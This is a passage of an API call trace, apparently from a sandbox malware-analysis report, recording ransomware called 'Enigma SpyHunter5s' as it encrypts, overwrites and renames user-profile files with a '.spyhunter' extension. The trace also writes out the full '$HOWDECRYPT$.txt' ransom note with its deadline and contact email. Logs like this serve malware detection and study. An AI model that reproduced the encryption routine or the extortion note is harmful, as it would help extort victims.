lpNumberOfBytesWritten=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x25cefac*, lpNumberOfBytesWritten=0x25cef6c*=0x4, lpOverlapped=0x0) returned 1 [0143.082] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef6c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef6c*=0x30, lpOverlapped=0x0) returned 1 [0143.082] CloseHandle (hObject=0xb0) returned 1 [0143.082] GetProcessHeap () returned 0x2c0000 [0143.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.082] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.spyhunter") returned 46 [0143.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat.log2.spyhunter")) returned 1 [0143.082] GetProcessHeap () returned 0x2c0000 [0143.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.083] GetProcessHeap () returned 0x2c0000 [0143.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.083] GetProcessHeap () returned 0x2c0000 [0143.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35efb8 | out: hHeap=0x2c0000) returned 1 [0143.083] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefa8 | out: pbBuffer=0x25cefa8) returned 1 [0143.083] GetProcessHeap () returned 0x2c0000 [0143.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.083] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cefa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cefa0*=0x30) returned 1 [0143.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.083] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0143.083] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".txt") returned 0x0 [0143.083] GetProcessHeap () returned 0x2c0000 [0143.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0143.084] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cef64*=0x2800, lpOverlapped=0x0) returned 1 [0143.139] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.140] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cef64*=0x2800, lpOverlapped=0x0) returned 1 [0143.140] GetProcessHeap () returned 0x2c0000 [0143.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0143.140] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.140] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x25cefa4*, lpNumberOfBytesWritten=0x25cef64*=0x4, lpOverlapped=0x0) returned 1 [0143.272] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef64*=0x30, lpOverlapped=0x0) returned 1 [0143.272] CloseHandle (hObject=0xb0) returned 1 [0143.272] GetProcessHeap () returned 0x2c0000 [0143.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.272] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.spyhunter") returned 46 [0143.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat.log1.spyhunter")) returned 1 [0143.273] GetProcessHeap () returned 0x2c0000 [0143.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.273] GetProcessHeap () returned 0x2c0000 [0143.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.273] GetProcessHeap () returned 0x2c0000 [0143.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x371090 | out: hHeap=0x2c0000) returned 1 [0143.273] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefa8 | out: pbBuffer=0x25cefa8) returned 1 [0143.273] GetProcessHeap () returned 0x2c0000 [0143.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.273] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cefa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cefa0*=0x30) returned 1 [0143.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.274] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0143.274] StrStrW (lpFirst="Desktop.lnk", lpSrch=".txt") returned 0x0 [0143.274] GetProcessHeap () returned 0x2c0000 [0143.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.274] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cef64*=0x1d3, lpOverlapped=0x0) returned 1 [0143.276] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.276] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cef64*=0x1d3, lpOverlapped=0x0) returned 1 [0143.276] GetProcessHeap () returned 0x2c0000 [0143.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.276] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.276] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x25cefa4*, lpNumberOfBytesWritten=0x25cef64*=0x4, lpOverlapped=0x0) returned 1 [0143.276] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef64*=0x30, lpOverlapped=0x0) returned 1 [0143.276] CloseHandle (hObject=0xb0) returned 1 [0143.276] GetProcessHeap () returned 0x2c0000 [0143.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.277] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.spyhunter") returned 48 [0143.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk.spyhunter" (normalized: "c:\\users\\default\\links\\desktop.lnk.spyhunter")) returned 1 [0143.277] GetProcessHeap () returned 0x2c0000 [0143.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.277] GetProcessHeap () returned 0x2c0000 [0143.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.277] GetProcessHeap () returned 0x2c0000 [0143.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x343780 | out: hHeap=0x2c0000) returned 1 [0143.277] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefa0 | out: pbBuffer=0x25cefa0) returned 1 [0143.277] GetProcessHeap () returned 0x2c0000 [0143.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.277] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef98*=0x30) returned 1 [0143.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.278] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0143.278] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0143.278] GetProcessHeap () returned 0x2c0000 [0143.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.278] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cef5c*=0x244, lpOverlapped=0x0) returned 1 [0143.279] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.279] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x25cef5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cef5c*=0x244, lpOverlapped=0x0) returned 1 [0143.279] GetProcessHeap () returned 0x2c0000 [0143.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.279] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.279] WriteFile (in: hFile=0xb0, lpBuffer=0x25cef9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef5c, lpOverlapped=0x0 | out: lpBuffer=0x25cef9c*, lpNumberOfBytesWritten=0x25cef5c*=0x4, lpOverlapped=0x0) returned 1 [0143.279] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef5c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef5c*=0x30, lpOverlapped=0x0) returned 1 [0143.279] CloseHandle (hObject=0xb0) returned 1 [0143.279] GetProcessHeap () returned 0x2c0000 [0143.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.279] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.spyhunter") returned 48 [0143.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\links\\desktop.ini.spyhunter")) returned 1 [0143.546] GetProcessHeap () returned 0x2c0000 [0143.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.547] GetProcessHeap () returned 0x2c0000 [0143.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.547] GetProcessHeap () returned 0x2c0000 [0143.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383bb0 | out: hHeap=0x2c0000) returned 1 [0143.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.547] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.547] WriteFile (in: hFile=0xb0, lpBuffer=0x25ceed3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceffc, lpOverlapped=0x0 | out: lpBuffer=0x25ceed3*, lpNumberOfBytesWritten=0x25ceffc*=0x127, lpOverlapped=0x0) returned 1 [0143.548] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.548] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceffc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceffc*=0x2ac, lpOverlapped=0x0) returned 1 [0143.548] CloseHandle (hObject=0xb0) returned 1 [0143.548] GetProcessHeap () returned 0x2c0000 [0143.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65d48 | out: hHeap=0x2c0000) returned 1 [0143.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.549] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.549] WriteFile (in: hFile=0xb0, lpBuffer=0x25ceecf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceff8, lpOverlapped=0x0 | out: lpBuffer=0x25ceecf*, lpNumberOfBytesWritten=0x25ceff8*=0x127, lpOverlapped=0x0) returned 1 [0143.549] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.550] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceff8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceff8*=0x2ac, lpOverlapped=0x0) returned 1 [0143.550] CloseHandle (hObject=0xb0) returned 1 [0143.550] GetProcessHeap () returned 0x2c0000 [0143.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3003b70 | out: hHeap=0x2c0000) returned 1 [0143.550] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cef98 | out: pbBuffer=0x25cef98) returned 1 [0143.550] GetProcessHeap () returned 0x2c0000 [0143.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0143.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cef90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cef90*=0x30) returned 1 [0143.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.550] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0143.550] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".txt") returned 0x0 [0143.550] GetProcessHeap () returned 0x2c0000 [0143.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.551] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cef54*=0x110, lpOverlapped=0x0) returned 1 [0143.551] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.551] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x25cef54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cef54*=0x110, lpOverlapped=0x0) returned 1 [0143.551] GetProcessHeap () returned 0x2c0000 [0143.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.552] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.552] WriteFile (in: hFile=0xb0, lpBuffer=0x25cef94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef54, lpOverlapped=0x0 | out: lpBuffer=0x25cef94*, lpNumberOfBytesWritten=0x25cef54*=0x4, lpOverlapped=0x0) returned 1 [0143.552] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef54, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cef54*=0x30, lpOverlapped=0x0) returned 1 [0143.552] CloseHandle (hObject=0xb0) returned 1 [0143.552] GetProcessHeap () returned 0x2c0000 [0143.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.552] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.spyhunter") returned 107 [0143.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.spyhunter" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.spyhunter")) returned 1 [0143.553] GetProcessHeap () returned 0x2c0000 [0143.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.553] GetProcessHeap () returned 0x2c0000 [0143.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0143.553] GetProcessHeap () returned 0x2c0000 [0143.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69b68 | out: hHeap=0x2c0000) returned 1 [0143.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0143.555] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.555] WriteFile (in: hFile=0xb0, lpBuffer=0x25ceec7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceff0, lpOverlapped=0x0 | out: lpBuffer=0x25ceec7*, lpNumberOfBytesWritten=0x25ceff0*=0x127, lpOverlapped=0x0) returned 1 [0143.555] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.555] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceff0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceff0*=0x2ac, lpOverlapped=0x0) returned 1 [0143.557] CloseHandle (hObject=0xb0) returned 1 [0143.557] GetProcessHeap () returned 0x2c0000 [0143.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffb188 | out: hHeap=0x2c0000) returned 1 [0143.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0143.589] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.589] WriteFile (in: hFile=0x178, lpBuffer=0x25ceec3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cefec, lpOverlapped=0x0 | out: lpBuffer=0x25ceec3*, lpNumberOfBytesWritten=0x25cefec*=0x127, lpOverlapped=0x0) 